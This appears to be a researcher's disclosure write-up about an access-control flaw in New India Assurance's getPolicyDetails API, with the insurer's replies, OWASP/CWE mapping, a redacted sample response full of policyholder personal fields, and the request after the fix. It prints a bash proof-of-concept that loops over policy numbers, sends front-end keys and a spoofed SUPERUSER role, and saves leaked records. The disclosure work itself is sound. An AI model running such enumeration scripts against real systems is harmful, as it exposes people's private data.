Skip to content

The New India Assurance Co Ltd Alleged Vulnerability 2024

An "alleged" vulnerability in the New India Assurance website allowed downloading sensitive personal information of policyholder simply by the policy number.

Summary of the "alleged" vulnerabilities:

Sr API Date reported Date fixed Days taken CERT-in reference number
1 getPolicyDetails 31 October 2024 before 18 November 2024 Less than 18 not assigned due to non-reproducibility (due to delay in reporting it to CERT after reporting it to NIA)

Root cause in OWASP terms:

  • A01 2021 Broken Access Control: CWE-35 Path Traversal, CWE-284 Improper Access Control, CWE-285 Improper Authorization
  • A04 2021 Insecure Design: Insecure Direct Object Reference
  • A07 2021 Identification and Authentication Failures: CWE-287 Improper Authentication, CWE-613 Insufficient Session Expiration

It is important to note that the company denied existence of any vulnerability.

Thank you for your valuable feedback. We would like to inform you that your concerns have been reviewed by the relevant team, and it has been confirmed that the system does not permit downloading of other insured details. We assure you that NIA is committed to maintaining the safety and security of the customers and will continue to do so. We consider the matter resolved and are closing it accordingly.

After providing them with a sample JSON file, they replied as follows:

Dear Sir,

Thank you very much for your revert and inputs.

We really appreciate your concern on the matter and seriousness associated with it.

The fact of matter is that we are having a managed SOC and as soon as we received your alert, we had shared the same with our partners for their response post which immediately we sought the services of Cert-In empanelled Independent Assurance Auditor. Based on their observations, we updated both Cert-In as well as IRDA on this issue and shared our response to your query. There was no intention of covering up and NIA believes in collaborative efforts to mitigate vulnerabilities. We are very much interested to learn more on this issue/other cyber security related issues from you and our INFOSEC team will > coordinate with you to seek your appointment and meet you in person, if it is acceptable to you, to learn more and to infuse improvements.

We once again thank you for the inputs and support.

$$$

Chief Manager,

Corporate Finance & Accounts Dept.,

1. getPolicyDetails

The API relied on headers api_key and checksum but these were available in the front-end code itself, and were not tied to any user session. userid and customer ID were also not authenticated or signed.

sample_script.sh
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
#!/bin/bash
for POLICY_NUMBER in $$$$$$$$ $$$$$$$$; do
    curl 'https://www.newindia.co.in/BaNCSIntegrationWebComp/rest/commoncomponent/getPolicyDetails' -X POST \
    -H 'customerName: CUSTOMER' \
    -H 'typeOfCustomer: CUSTOMER' \
    -H 'api_key: $$$$$$$$' \
    -H 'checksum: $$$$$$$$' \
    -H 'applicationid: portal' \
    -H 'userid: CUSTCG0000' \
    --data-raw '{"userProfile":{"userId":"CUSTCG0000","loggedInRole":"SUPERUSER"},"quote":{"policyNumber":"'"$POLICY_NUMBER"'","processType":"NB","productCode":"PU"},"productCode":"PU"}' \
    -o policy_leak_$POLICY_NUMBER.json
done
Sample output 
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
{
    "header": {
        "eventID": "getPolicyHolderDetail",
        "applicationId": "portal",
        "responseCode": 0,
        "coRelationId": "portal_$$$$_commoncomponent_getPolicyDetails_1730364137360_PRELOGIN",
        "baNCSIntegrationSessionVO": {
            "userCode": "",
            "rolecode": "",
            "userName": "",
            "sessionStatus": ""
        },
        "customerName": "CUSTOMER",
        "typeOfCustomer": "CUSTOMER",
        "deviceID": "$$$$"
    },
    "quote": {
        "termUnit": "Years",
        "policyHolderName": "$$$$",
        "policyBranchCode": "$$$$",
        "quoteNumber": "$$$$",
        "policyId": "$$$$",
        "policyNumber": "$$$$",
        "policyExpiryDate": "$$$$",
        "policyInceptionDate": "$$$$",
        "productCode": "$$$$",
        "policyHolderCode": "$$$$",
        "dateOfApplication": "$$$$",
        "policyStartDate": "$$$$",
        "sumInsured": "$$$$",
        "term": "$$$$",
        "productName": "$$$$",
        "currentStatus": "$$$$",
        "spouseCount": "0",
        "risks": [
            {
                "riskDetails": {
                    "relationWithPolicyHolder": "SELF",
                    "occupation": "$$$$",
                    "relationOfTraveller": null,
                    "nameOfTraveller": null,
                    "genderOfTraveller": null,
                    "dependentChildren": null,
                    "natureOfId": null,
                    "otherId": null,
                    "idDocNo": null,
                    "dependentType": null,
                    "correspContact": null,
                    "document": null,
                    "nationality": "Indian",
                    "passportNo": null,
                    "dateOfIssue": null,
                    "passportExpiryDate": null,
                    "visaWorkPermit": null,
                    "proposedDateOfDeparture": null,
                    "noOfDaysStayedOutsideIndia": null,
                    "expectedNoOfMonthsStudyEmployment": null,
                    "nameOfSchoolWorkplace": null,
                    "addressOfSchoolWorkplace": null,
                    "telNoSchoolWorkplace": null,
                    "sponsorName": null,
                    "sponsorAddress": null,
                    "relationOfSponsor": null,
                    "telNoOfSponsor": null,
                    "otherOccupationDetails": null,
                    "extensionPeriodDays": null,
                    "dateOfBirth": "$$$$",
                    "nameOfInsuredPerson": "$$$$",
                    "ageInYrs": null,
                    "sex": null,
                    "isSpouseEarning": null,
                    "monthlyIncome": "$$$$",
                    "specialConditions": null,
                    "serialNo": null,
                    "relationWithNominee": "$$$$",
                    "nomineeName": "$$$$",
                    "isTableACoverRequired": null,
                    "sumInsured": "$$$$",
                    "sumInsuredForTableA": "$$$$",
                    "isTableBCoverRequired": null,
                    "sumInsuredForTableB": "0",
                    "isTableCCoverRequired": null,
                    "sumInsuredForTableC": "0",
                    "isTableDCoverRequired": null,
                    "sumInsuredForTableD": "0",
                    "capitalSumInsured": null,
                    "rateForTableA": "$$$$",
                    "rateForTableB": "$$$$",
                    "rateForTableC": "$$$$",
                    "rateForTableD": "$$$$",
                    "medicalHistoryDetails": null,
                    "physicianDetails": null,
                    "nomineeDetails": null,
                    "healthStatus": null,
                    "claimReporting": null,
                    "policyExtensionDate": null,
                    "policyExtensionPeriod": null,
                    "anyPhysicalDefects": "N",
                    "mentionDefects": null,
                    "anyPreviousClaim": "N",
                    "cbPerc": null,
                    "cbAmount": null,
                    "isWarAndAlliedRisksCoverage": "N",
                    "countryOfOperation": "INDIA",
                    "typeOfPeriod": "NA",
                    "rateForAbnormalOrApprehensiveorWarPeriod": "0",
                    "sumInsuredForWarndAlliedRiskCoverage": "0",
                    "rateForPeaceTimeorNormalPeriod": null,
                    "nameOfTheCountry": null
                },
                "coverages": [
                    {
                        "coverDetails": {
                            "medicalCoverReq": "N"
                        }
                    }
                ]
            }
        ],
        "partyDetailsList": [
            {
                "partyType": "$$$$",
                "partyStakeCode": "$$$$",
                "stakeCode": "$$$$",
                "individualDetails": {
                    "firstName": "$$$$",
                    "lastName": "$$$$",
                    "gender": "$$$$",
                    "dateOfBirth": "$$$$",
                    "buildingNoStreet": "$$$$",
                    "cityName": "$$$$",
                    "pinCode": "$$$$",
                    "mobileNo": "$$$$",
                    "emailId": "$$$$",
                    "startDate": "$$$$",
                    "contactType": "$$$$",
                    "clientType": "$$$$",
                    "state": "$$$$",
                    "city": "$$$$",
                    "aadhaarAuthStatus": "$$$$",
                    "nationality": "$$$$",
                    "nameOfTheCountry": "$$$$",
                    "ekycStatus": "$$$$"
                }
            },
            {
                "partyCode": "GC00000008",
                "partyStakeCode": "GCE",
                "partyName": "GST-CENTRAL GOVT ",
                "address": "NEW DELHI",
                "stakeCode": "GCE",
                "individualDetails": {
                    "relationshipWithRegisteredUser": "",
                    "buildingNoStreet": "NEW DELHI",
                    "pinCode": "110001",
                    "startDate": "$$$$"
                },
                "organizationDetails": {
                    "startDate": "$$$$",
                    "pinCode": "110001",
                    "businessTelNumExtn": "",
                    "panNumber": ""
                }
            },
            {
                "partyCode": "GS00000033",
                "partyStakeCode": "GSS",
                "partyName": "GST-STATE GOV-RAJASTHAN ",
                "address": "RAJASTHAN",
                "stakeCode": "GSS",
                "individualDetails": {
                    "relationshipWithRegisteredUser": "",
                    "buildingNoStreet": "RAJASTHAN",
                    "pinCode": "313001",
                    "startDate": "$$$$"
                },
                "organizationDetails": {
                    "startDate": "$$$$",
                    "pinCode": "313001",
                    "businessTelNumExtn": "",
                    "panNumber": ""
                }
            },
            {
                "partyCode": "DI830000",
                "partyStakeCode": "DIRECT",
                "partyName": "DI_DIGITAL HUB DI_DIGITAL HUB",
                "address": "6TH FLOOR, MOTI MAHAL,",
                "stakeCode": "DIRECT",
                "individualDetails": {
                    "relationshipWithRegisteredUser": "",
                    "buildingNoStreet": "6TH FLOOR, MOTI MAHAL,",
                    "pinCode": "400020",
                    "startDate": "$$$$"
                },
                "organizationDetails": {
                    "startDate": "$$$$",
                    "pinCode": "400020",
                    "businessTelNumExtn": "",
                    "panNumber": ""
                }
            }
        ],
        "premiumDetails": {
            "totalPremium": "$$$$",
            "serviceTax": "$$$$",
            "netPremium": "$$$$"
        },
        "coverage": "Self",
        "numChildrenToCover": "0",
        "renewedQuoteNo": "$$$$",
        "coverCode": "STDCOVER"
    },
    "userProfile": {
        "footer": {
            "errorCode": "0"
        }
    }
}

$$ Alleged fix

After the "alleged" fix, the new curl request was as follows. Observe the new header X-Auth-Token and the additional Cookie header.

sample_script_fixed.sh
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
curl 'https://www.newindia.co.in/BaNCSIntegrationWebComp/rest/commoncomponent/getPolicyDetails' -X POST \
 -H 'X-Auth-Token: $$$$$$$$' \
 -H 'customerName: CUSTOMER' \
 -H 'typeOfCustomer: CUSTOMER' \
 -H 'api_key: $$$$$$$$' \
 -H 'checksum: $$$$' \
 -H 'applicationid: portal' \
 -H 'Cookie: citrix_ns_id=$$$$$$$$' \
 -H 'userid: CUSTCG0000' \
 --data-raw '{"userProfile":{"userId":"CUSTCG0000","loggedInRole":"SUPERUSER"},"quote":{"policyNumber":"$$$$$$$$","processType":"NB","productCode":"PU"},"productCode":"PU"}'